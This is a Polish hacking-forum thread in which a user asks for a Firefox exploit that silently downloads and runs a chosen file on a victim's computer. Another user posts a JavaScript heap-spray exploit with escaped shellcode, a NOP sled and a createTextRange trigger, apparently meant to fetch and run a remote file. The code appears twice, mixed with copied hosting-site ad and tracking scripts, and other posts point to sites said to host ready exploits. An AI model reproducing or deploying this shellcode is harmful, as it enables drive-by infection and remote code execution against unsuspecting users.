You are using an out of date browser. It may not display this or other websites correctly.
You should upgrade or use an alternative browser.
You should upgrade or use an alternative browser.
Poszukuje expolita na firefoxa!
- Thread starter tuc666
- Rozpoczęty
I jeszcze żeby wyprał skarpetki i przyniósł śniadanko do łóżka. Aaaa i jeszcze później pozmywał.Originally posted by tuc666
Poszukuje expolita na firefoxa (najlepiej jakiegos najnowszego), ktory po wejsciu na dany link automatycznie sciagnie podany przeze mnie plik i uruchomi go na komputerze ofiary.
One są własnie tak pisane aby ktoś kto się nie zna ich nie uzywał.Originally posted by tuc666
Nie umiem napisac exploita wiec myslalem ze jakis doswiadczony uzytkownik forum mi pomoze -.-' Szukalem tutaj takowego ale kiedy jakiegos znalazlem nie dzialal mi
No bo takiego na chwile obecną nie maOriginally posted by tuc666
Nie umiem napisac exploita wiec myslalem ze jakis doswiadczony uzytkownik forum mi pomoze -.-' Szukalem tutaj takowego ale kiedy jakiegos znalazlem nie dzialal mi
jak nie ma jak jest :!:
niedosc ze wali po lbie IE to FF ma to samo
www.pepi.za.pl/inde.htm
kodu nie podam
ale masz jak co czas na to aby go wydobyc albo uzyc nie podatnej przegladarki na to :]
begin
if pepi_help then click button + ;
end.
niedosc ze wali po lbie IE to FF ma to samo
www.pepi.za.pl/inde.htm
kodu nie podam
ale masz jak co czas na to aby go wydobyc albo uzyc nie podatnej przegladarki na to :]
begin
if pepi_help then click button + ;
end.
N
nBD
Gość
ja podam
nie ma tak latwo, z unescape musisz sobie poradzic sam
Kod:
<input type="checkbox" id="blah">
<SCRIPT language="javascript">
shellcode = unescape(
"%uCCE9%u0000%u5F00%u56E8%u0000%u8900%u50C3%u8E68%u0E4E%uE8EC" +
"%u0060%u0000%uC931%uB966%u6E6F%u6851%u7275%u6D6C%uFF54%u50D0" +
"%u3668%u2F1A%uE870%u0046%u0000%uC931%u5151%u378D%u8D56%u0877" +
"%u5156%uD0FF%u6853%uFE98%u0E8A%u2DE8%u0000%u5100%uFF57%u31D0" +
"%u49C9%u9090%u6853%uD87E%u73E2%u19E8%u0000%uFF00%u55D0%u6456" +
"%u30A1%u0000%u8B00%u0C40%u708B%uAD1C%u688B%u8908%u5EE8%uC35D" +
"%u5553%u5756%u6C8B%u1824%u458B%u8B3C%u0554%u0178%u8BEA%u184A" +
"%u5A8B%u0120%uE3EB%u4935%u348B%u018B%u31EE%uFCFF%uC031%u38AC" +
"%u74E0%uC107%u0DCF%uC701%uF2EB%u7C3B%u1424%uE175%u5A8B%u0124" +
"%u66EB%u0C8B%u8B4B%u1C5A%uEB01%u048B%u018B%uE9E8%u0002%u0000" +
"%uC031%uEA89%u5E5F%u5B5D%uE8C3%uFF2F%uFFFF%u686D%u2E68%u7865" +
"%u0065%u7570%u6873%u682e%u6d74%u006c%u0000");
bigblock = unescape("%u9090%u9090");
slackspace = 20 + shellcode.length
while (bigblock.length < slackspace)
bigblock += bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length + slackspace < 040000)
block = block + block + fillblock;
memory = new Array();
for ( i = 0; i < 2020; i++ )
memory[i] = block + shellcode;
var r = document.getElementById('blah').createTextRange();
</script>Originally posted by Pepi
jak nie ma jak jest :!:
niedosc ze wali po lbie IE to FF ma to samo
www.pepi.za.pl/inde.htm
No niby tak ale kolega prosił (bardziej chciał) żeby pod ff scjągało i uruchomiało plik to chyba takiego sploita na chwile obecną nie ma
http://hydra.e90.biz/yep tutaj masz juz gotowego
Dark Smark
Były Moderator
- Dołączył
- Kwiecień 29, 2006
- Posty
- 1953
problem
<script type="text/javascript" > if (gad_act_h>gad_max_h && gad_act_w>gad_max_w) document.write('<sc'+'ript type="text/javascript">if (document.getElementById('adKontekst_0')==null) {var adKontekst_pola=new Array;document.write('<scr'+'ipt type="text/javascript" '+'src="http://adsearch.wp.pl/akon/spliter?prid=74&caid=68779&ns='+(new Date()).getTime()+'"'+'></'+'scri'+'pt>');}var adc_i=adKontekst_pola.length;document.write("<div id='adKontekst_"+adc_i+"'> </"+"div>");adKontekst_pola[adc_i]=new Object();adKontekst_pola[adc_i].nazwa="adKontekst_"+adc_i;adKontekst_pola[adc_i].typ=102;adKontekst_pola[adc_i].r=1;adKontekst
_pola[adc_i].c=2;adKontekst_pola[adc_i].x=468;adKontekst_pola[adc_i].y=60;adKont
e
kst_pola[adc_i].paleta=new Object();adKontekst_pola[adc_i].paleta.kolor_tlo="#000000";adKontekst_pola[adc_i].paleta.kolor_tytul="#FF0000";adKontekst_pola[adc_i].paleta.kolor_opis="#ffffff";adKontekst_pola[adc_i].paleta.kolor_url="#FF6633";adKontekst_pola[adc_i].paleta.kolor_naglowek="#000000";adKontekst_pola[adc_i].nform=8;</sc'+'ript>')</script>
<script type="text/javascript" > if (gad_act_h>gad_max_h && gad_act_w>gad_max_w) { if (NS4) { document.write('</LAYER>'); } if ((IE4) || (NS6)) { document.write('</DIV>'); } ifloatX=floatX; ifloatY=floatY; define(); window.onresize=define; lastX=-1; lastY=-1; adjust(); } </script>
<div id="Friko_stopka">Friko.pl - Darmowe serwery WWW</div>
<script language="JavaScript" type="text/javascript">Friko_stopka.style.display = 'none';</script>[/b][/quote]
To tejt ta strona w całości niema tu ścieżki do PLIKU który ma się wczytać :/ :hahaha:
'); </script><input type="checkbox" id="blah">
<SCRIPT language="javascript">
shellcode = unescape(
"%uCCE9%u0000%u5F00%u56E8%u0000%u8900%u50C3%u8E68%u0E4E%uE8EC" +
"%u0060%u0000%uC931%uB966%u6E6F%u6851%u7275%u6D6C%uFF54%u50D0" +
"%u3668%u2F1A%uE870%u0046%u0000%uC931%u5151%u378D%u8D56%u0877" +
"%u5156%uD0FF%u6853%uFE98%u0E8A%u2DE8%u0000%u5100%uFF57%u31D0" +
"%u49C9%u9090%u6853%uD87E%u73E2%u19E8%u0000%uFF00%u55D0%u6456" +
"%u30A1%u0000%u8B00%u0C40%u708B%uAD1C%u688B%u8908%u5EE8%uC35D" +
"%u5553%u5756%u6C8B%u1824%u458B%u8B3C%u0554%u0178%u8BEA%u184A" +
"%u5A8B%u0120%uE3EB%u4935%u348B%u018B%u31EE%uFCFF%uC031%u38AC" +
"%u74E0%uC107%u0DCF%uC701%uF2EB%u7C3B%u1424%uE175%u5A8B%u0124" +
"%u66EB%u0C8B%u8B4B%u1C5A%uEB01%u048B%u018B%uE9E8%u0002%u0000" +
"%uC031%uEA89%u5E5F%u5B5D%uE8C3%uFF2F%uFFFF%u686D%u2E68%u7865" +
"%u0065%u7570%u6873%u682e%u6d74%u006c%u0000");
bigblock = unescape("%u9090%u9090");
slackspace = 20 + shellcode.length
while (bigblock.length < slackspace)
bigblock += bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length + slackspace < 0x40000)
block = block + block + fillblock;
memory = new Array();
for ( i = 0; i < 2020; i++ )
memory = block + shellcode;
var r = document.getElementById('blah').createTextRange();
</script>
</noembed></noscript></style></head>
<script type="text/javascript"><!--<![CDATA[
/* ŠAdOcean 2004-2005 */
if(location.protocol.substr(0,4)=='http')document.write(unescape('%3C')+'script id="Przestrzen reklamowa._semka.pl.Hosting.osemkapl_hosting_zapl" src="'+location.protocol+'//s1.ad.adocean.pl/_'+(new Date()).getTime()+'/ad.js?id=kH1FhdvXPPJDfKqXxrldmVFngrC33B6rluTgVmthAxD.K7/x='+screen.width+'/y='+screen.height+'" type="text/javascript"'+unescape('%3E%3C')+'/script'+unescape('%3E'));
//]]>--></script>
<script language="javascript" type="text/javascript">
<!--
var pp_gemius_identifier = new String('cis1vQMP1bZNyW9kZm1sNrRJ7xc_e2cHd4j554Pwuwb.L7');
//-->
</script>
<script language="javascript" type="text/javascript" src="../adnet.hit.gemius.pl/pp_gemius.js"></script>
<script src="../www.google-analytics.com/urchin.js" type="text/javascript">
</script>
<script type="text/javascript">
_uacct = "UA-153549-5";
urchinTracker();
</script>
<script type="text/javascript" >
gad_act_w=document.body.offsetWidth;
gad_act_h=document.body.offsetHeight;
gad_max_w=800;
gad_max_h=30;
if (gad_act_h>gad_max_h && gad_act_w>gad_max_w) {
floatX=-1000;
floatY=5;
layerwidth=480;
layerheight=600;
delayspeed=0;
NS6=false; IE4=(document.all);
if (!IE4) {
NS6=(document.getElementById);
}
NS4=(document.layers);
function adjust() {
if ((NS4) || (NS6)) {
if (lastX==-1 || delayspeed==0) { lastX=window.pageXOffset + floatX; lastY=window.pageYOffset + floatY;
} else {
var dx=Math.abs(window.pageXOffset+floatX-lastX);
var dy=Math.abs(window.pageYOffset+floatY-lastY);
var d=Math.sqrt(dx*dx+dy*dy);
var c=Math.round(d/10);
if (window.pageXOffset+floatX>lastX) {lastX=lastX+delayspeed+c;}
if (window.pageXOffset+floatX<lastX) {lastX=lastX-delayspeed-c;}
if (window.pageYOffset+floatY>lastY) {lastY=lastY+delayspeed+c;}
if (window.pageYOffset+floatY<lastY) {lastY=lastY-delayspeed-c;} }
if (NS4) { document.layers['floatlayer'].pageX = lastX; document.layers['floatlayer'].pageY = lastY; }
if (NS6) {
document.getElementById('floatlayer').style.left=lastX; document.getElementById('floatlayer').style.top=lastY;
}
}
else if (IE4){
if (lastX==-1 || delayspeed==0) {
lastX=document.body.scrollLeft + floatX; lastY=document.body.scrollTop + floatY;
} else {
var dx=Math.abs(document.body.scrollLeft+floatX-lastX);
var dy=Math.abs(document.body.scrollTop+floatY-lastY);
var d=Math.sqrt(dx*dx+dy*dy);
var c=Math.round(d/10);
if (document.body.scrollLeft+floatX>lastX) {lastX=lastX+delayspeed+c;}
if (document.body.scrollLeft+floatX<lastX) {lastX=lastX-delayspeed-c;}
if (document.body.scrollTop+floatY>lastY) {lastY=lastY+delayspeed+c;}
if (document.body.scrollTop+floatY<lastY) {lastY=lastY-delayspeed-c;}
}
document.all['floatlayer'].style.posLeft = lastX; document.all['floatlayer'].style.posTop = lastY;
}
setTimeout('adjust()',10);
}
function define() { if ((NS4) || (NS6)) { floatX=window.innerWidth-layerwidth-14; floatY=0; } if (IE4) { floatX=document.body.offsetWidth-layerwidth-14; floatY=0; } }
if (NS4) { document.write('<LAYER NAME="floatlayer" LEFT="'+floatX+'" TOP="'+floatY+'" style="text-align: center;">'); }
if ((IE4) || (NS6)) { document.write('<div id="floatlayer" style="position:absolute; left:'+floatX+'; top:'+floatY+'; text-align: right;">'); } }
</script>
<script type="text/javascript" > if (gad_act_h>gad_max_h && gad_act_w>gad_max_w) document.write('<div id=fzgad style="padding: 0px;z-index: 1001;position: absolute;"><div style="position: absolute; top: 0px; right: -20px; float: right; text-align: right; background-color: #000; color: #ccc; vertical-align: top; margin: auto; padding: 3px; cursor: pointer; font-weight: bold; font-family: arial; font-size: 11px;" onclick="document.all.fzgad.style.display='none';">[x]
<script type="text/javascript" > if (gad_act_h>gad_max_h && gad_act_w>gad_max_w) document.write('<sc'+'ript type="text/javascript">if (document.getElementById('adKontekst_0')==null) {var adKontekst_pola=new Array;document.write('<scr'+'ipt type="text/javascript" '+'src="http://adsearch.wp.pl/akon/spliter?prid=74&caid=68779&ns='+(new Date()).getTime()+'"'+'></'+'scri'+'pt>');}var adc_i=adKontekst_pola.length;document.write("<div id='adKontekst_"+adc_i+"'> </"+"div>");adKontekst_pola[adc_i]=new Object();adKontekst_pola[adc_i].nazwa="adKontekst_"+adc_i;adKontekst_pola[adc_i].typ=102;adKontekst_pola[adc_i].r=1;adKontekst
_pola[adc_i].c=2;adKontekst_pola[adc_i].x=468;adKontekst_pola[adc_i].y=60;adKont
e
kst_pola[adc_i].paleta=new Object();adKontekst_pola[adc_i].paleta.kolor_tlo="#000000";adKontekst_pola[adc_i].paleta.kolor_tytul="#FF0000";adKontekst_pola[adc_i].paleta.kolor_opis="#ffffff";adKontekst_pola[adc_i].paleta.kolor_url="#FF6633";adKontekst_pola[adc_i].paleta.kolor_naglowek="#000000";adKontekst_pola[adc_i].nform=8;</sc'+'ript>')</script>
<script type="text/javascript" > if (gad_act_h>gad_max_h && gad_act_w>gad_max_w) { if (NS4) { document.write('</LAYER>'); } if ((IE4) || (NS6)) { document.write('</DIV>'); } ifloatX=floatX; ifloatY=floatY; define(); window.onresize=define; lastX=-1; lastY=-1; adjust(); } </script>
<div id="Friko_stopka">Friko.pl - Darmowe serwery WWW</div>
<script language="JavaScript" type="text/javascript">Friko_stopka.style.display = 'none';</script>[/b][/quote]
To tejt ta strona w całości niema tu ścieżki do PLIKU który ma się wczytać :/ :hahaha:
Udostępnij: